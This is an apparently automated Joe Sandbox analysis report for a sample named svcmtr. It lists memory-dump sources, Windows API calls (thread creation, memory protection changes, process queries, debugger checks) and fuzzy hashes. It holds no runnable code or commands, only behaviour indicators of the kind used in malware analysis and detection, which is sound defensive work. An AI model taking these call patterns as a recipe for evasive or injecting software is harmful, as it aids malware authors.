                                                                                                                            • CreateThread.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 00232124
                                                                                                                              • Part of subcall function 0023216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: d74dc855914b7349c3b0d40e2db62c309a59be95aa08991b47927ae15319f3fb
                                                                                                                            • Instruction ID: 3a8c5a65054a8280fac4d3f6f9b6f398294be1e8b296e0f40aade806a97c2582
                                                                                                                            • Opcode Fuzzy Hash: d74dc855914b7349c3b0d40e2db62c309a59be95aa08991b47927ae15319f3fb
                                                                                                                            • Instruction Fuzzy Hash: 922145FB634A22D6EB1D22B4CE66B7D540AE7E0700F68E53DA387D8183CCDD00A85460
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 00232124
                                                                                                                              • Part of subcall function 0023216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: 9349f056b0b02ee25d4394e217fd01f95e6d08a6e456e14775c8b4b7317b2888
                                                                                                                            • Instruction ID: 5cad33ed6b63dc750dfdfab05c4a8ce8c9df5328595ae0ecb5382b7ab27dba0c
                                                                                                                            • Opcode Fuzzy Hash: 9349f056b0b02ee25d4394e217fd01f95e6d08a6e456e14775c8b4b7317b2888
                                                                                                                            • Instruction Fuzzy Hash: AC11CEF7A30A23D6EB1D23B8CE6A77D5406E7E0700F2CE53E978B88183CDD800A85460
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 00232124
                                                                                                                              • Part of subcall function 0023216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: 6fa603f21a32fd82ace2bf48d055e2b0fa8e0f3ca1c3d1e55c02ee84f5a26be5
                                                                                                                            • Instruction ID: cd63bcd497d8fbff56450d58f769d65625f3a7f6b0fa1f7237168db7a85199c1
                                                                                                                            • Opcode Fuzzy Hash: 6fa603f21a32fd82ace2bf48d055e2b0fa8e0f3ca1c3d1e55c02ee84f5a26be5
                                                                                                                            • Instruction Fuzzy Hash: 2B116FF7634A23D6EF1D12B8CE65B7D5405E7E0700F68E539978B98197DCD8006C5460
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042570D: __getptd_noexit.LIBCMT ref: 0042570D
                                                                                                                            • __lock_file.LIBCMT ref: 00424F53
                                                                                                                              • Part of subcall function 004294CD: __lock.LIBCMT ref: 004294F2
                                                                                                                            • __fclose_nolock.LIBCMT ref: 00424F5E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2800547568-0
                                                                                                                            • Opcode ID: 1f5f3315ae4fde1789aa69123799fedb966fbeaeb054d224ed147cfcf4029b6d
                                                                                                                            • Instruction ID: 2b14ba32f7767529598eddfeb2aa0d2d10d090eb1bd0b8a509b205913a1b2d68
                                                                                                                            • Opcode Fuzzy Hash: 1f5f3315ae4fde1789aa69123799fedb966fbeaeb054d224ed147cfcf4029b6d
                                                                                                                            • Instruction Fuzzy Hash: 47F0C270B007219ADB10AB75A90275E7BA0AF81338FA2834EE4349A1C1CB3C89018E5E
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0042BB6C,?,?,00000000,00000000,00000000,?,00427528,00000001,00000214,?,00000000), ref: 0042CB03
                                                                                                                              • Part of subcall function 0042570D: __getptd_noexit.LIBCMT ref: 0042570D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 328603210-0
                                                                                                                            • Opcode ID: c2fc6f5b9b056656b9c4664acd15865b97f354cd22a97a416b74d970205f40a3
                                                                                                                            • Instruction ID: 8e65df08a9423b0807d497d14f4799f3672e50ee20dc361ebe088a0b243ff951
                                                                                                                            • Opcode Fuzzy Hash: c2fc6f5b9b056656b9c4664acd15865b97f354cd22a97a416b74d970205f40a3
                                                                                                                            • Instruction Fuzzy Hash: 9201D8313012359BEB24DF25FC96B6F3794EB81360F44462BE915C7290DB79DC00C688
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            • Opcode ID: 49143707107687e7b35d10633917b1b6a73f6eaea7c8d102e89f15c667ebe446
                                                                                                                            • Instruction ID: ea65d67206252ffdc72c700f6e9c5b87d3427a3003d7c2919f3606fe563283de
                                                                                                                            • Opcode Fuzzy Hash: 49143707107687e7b35d10633917b1b6a73f6eaea7c8d102e89f15c667ebe446
                                                                                                                            • Instruction Fuzzy Hash: 81F0B8FB670A2295FB1C22A0DD76B78000AE3E4701F68E83E6283D8682DCDD80905020
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 00231797
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 544645111-0
                                                                                                                            • Opcode ID: 7fdecd4c65e739fd43d314d6a2364bc55c7da5283aaa43a512b286945ce32d55
                                                                                                                            • Instruction ID: b25fa0194a4348a8930f8dcd6c84a6a012a76a0ef4f5cfec357320c3d2632542
                                                                                                                            • Opcode Fuzzy Hash: 7fdecd4c65e739fd43d314d6a2364bc55c7da5283aaa43a512b286945ce32d55
                                                                                                                            • Instruction Fuzzy Hash: FAF0BBB7B351128BEB1CAA98DD551FDF2A1A7E4712F3CA52ED003A8382EFA905705560
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            • Opcode ID: d3effeb4ccc460ffd5b9c48fd513fce9e933a506ef15c2b4fcc5ee762b752ca6
                                                                                                                            • Instruction ID: 7d799e208526352e69521f93076fe8d06240286659df5f408eabf4347344cfde
                                                                                                                            • Opcode Fuzzy Hash: d3effeb4ccc460ffd5b9c48fd513fce9e933a506ef15c2b4fcc5ee762b752ca6
                                                                                                                            • Instruction Fuzzy Hash: 17E0C2B2730A23D5DB2C22A8CD6B2BCA456EBD0301F5CE81A4587DC193DAE441809060
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __flsbuf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2056685748-0
                                                                                                                            • Opcode ID: 8681d032ff11c242d48313d070cd23993bb6e7951d600600577439931ece4efd
                                                                                                                            • Instruction ID: e01de4f2985e6a4c25230675727b24bf77244cde49041224cafbe23f2315b811
                                                                                                                            • Opcode Fuzzy Hash: 8681d032ff11c242d48313d070cd23993bb6e7951d600600577439931ece4efd
                                                                                                                            • Instruction Fuzzy Hash: 06E09230145120EECA250B20F0452357BA09F5171AFB846CFD590891E3CB3E94C2DA18
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __strftime_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2461563286-0
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            APIs
                                                                                                                            • __wcsupr_s_l.LIBCMT ref: 00424740
                                                                                                                              • Part of subcall function 00424700: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042470E
                                                                                                                              • Part of subcall function 00424700: _wcslwr_s_l_stat.LIBCMT ref: 0042471D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Locale$UpdateUpdate::___wcsupr_s_l_wcslwr_s_l_stat
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1994797442-0
                                                                                                                            APIs
                                                                                                                            • RtlEncodePointer.NTDLL(00000000,0042CCDA,0043B8B8,00000314,00000000,?,?,?,?,?,0042934B,0043B8B8,Microsoft Visual C++ Runtime Library,00012010), ref: 004273C8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EncodePointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2118026453-0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(?,998B1F24), ref: 00231E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(?,998B1F24), ref: 00231E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,75DC55D0,00000000), ref: 0041ED29
                                                                                                                            • RtlGetVersion.NTDLL ref: 0041ED5A
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0041ED84
                                                                                                                            • NtQueryInformationProcess.NTDLL ref: 0041EDB0
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 0041EDCB
                                                                                                                            • LoadIconW.USER32 ref: 0041EE1D
                                                                                                                            • RegisterClassExW.USER32(?), ref: 0041EE34
                                                                                                                            • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 0041EE6A
                                                                                                                            • InterlockedExchange.KERNEL32(?,0041ECC0), ref: 0041EE83
                                                                                                                            • CreateWindowExW.USER32 ref: 0041EEA8
                                                                                                                            • GetStartupInfoW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041EEFA
                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(%systemroot%\system32\,?,00000104,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041EF29
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Current$ClassCreateEnvironmentExchangeExpandHandleIconInfoInformationInterlockedLoadModuleProtectQueryRegisterStartupStringsVersionVirtualWindow
                                                                                                                            • String ID: $%systemroot%\system32\$0$D
                                                                                                                            • API String ID: 1361090928-3283359705
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00001000,00000000,00000018,?), ref: 0041EAB3
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0041EAB6
                                                                                                                            • NtQuerySystemInformation.NTDLL(0000000B,00000000,00001000,?), ref: 0041EAD1
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041EAE7
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0041EAEA
                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041EB32
                                                                                                                            • _strcpy_s.LIBCMT ref: 0041EB5A
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041EB68
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0041EB6B
                                                                                                                            • LoadLibraryExA.KERNEL32(0000005C,00000000,00000001), ref: 0041EB7C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,PsLookupProcessByProcessId), ref: 0041EB8E
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0041EB9A
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041EBB6
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0041EBB9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$FreeProcess$LibrarySystem$AddressAllocDirectoryInformationLoadProcQuery_strcpy_s
                                                                                                                            • String ID: PsLookupProcessByProcessId$\
                                                                                                                            • API String ID: 2503006650-1547739243
                                                                                                                            • Opcode ID: 43a0f01cdf794f41006e1963364c22ed5345e89fbe19fae2046950b1ed626966
                                                                                                                            • Instruction ID: d9b6583839900e7c546c71df0e51cb6a95a5132ca019d880cf3c400ebc5e44b3
                                                                                                                            • Opcode Fuzzy Hash: 43a0f01cdf794f41006e1963364c22ed5345e89fbe19fae2046950b1ed626966
                                                                                                                            • Instruction Fuzzy Hash: FC31E835641218ABD7209B75DC8CFEB7778FF44751F0005AAF90AD7290DBB49A84CAA8
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _aullshr
                                                                                                                            • String ID: 0>C$@:C$@:C
                                                                                                                            • API String ID: 4154462305-3304788932
                                                                                                                            • Opcode ID: 1700e1b6d897883276b98ea76e93d2e7ee8c6925a21909d7da617a8eaf8321bf
                                                                                                                            • Instruction ID: 6f33c4bb07da5afcf50d228bf944658890b72a782cf23c8074268a3509e2577d
                                                                                                                            • Opcode Fuzzy Hash: 1700e1b6d897883276b98ea76e93d2e7ee8c6925a21909d7da617a8eaf8321bf
                                                                                                                            • Instruction Fuzzy Hash: B9C17BB1A087009FD324DF2AD841A6BB7E5BFC9714F508A2EF699C7350E774D8418B86
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: ....................$P6C$P6C
                                                                                                                            • API String ID: 2102423945-367312072
                                                                                                                            • Opcode ID: 4ae34b23a890f7ea120bdd1b8495324c2c92c09c67ee2a06793238bebba49036
                                                                                                                            • Instruction ID: c50ebbbe94665e3b61506474d11c71efd2640967613476eb690509a89d1b308a
                                                                                                                            • Opcode Fuzzy Hash: 4ae34b23a890f7ea120bdd1b8495324c2c92c09c67ee2a06793238bebba49036
                                                                                                                            • Instruction Fuzzy Hash: 31919F756083419BC714DF25D8C1A9BBBE5FFC8344F008A2EF99987201D775E84ACB96
                                                                                                                            APIs
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 004255F2
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00425607
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(00431404), ref: 00425612
                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0042562E
                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00425635
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2579439406-0
                                                                                                                            • Opcode ID: 03755ccaf70ad708b6f4fab71e6332518628caabaa0e7df61347e8e180b5b247
                                                                                                                            • Instruction ID: 6bb5de789a321063787ca96de7b9cd1f4631822c0065670583fbb202f00acfec
                                                                                                                            • Opcode Fuzzy Hash: 03755ccaf70ad708b6f4fab71e6332518628caabaa0e7df61347e8e180b5b247
                                                                                                                            • Instruction Fuzzy Hash: D021BCB4901348AFD700DF29F98AB443BB0FB18315F50713AEA0987672E7B459858F8E
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
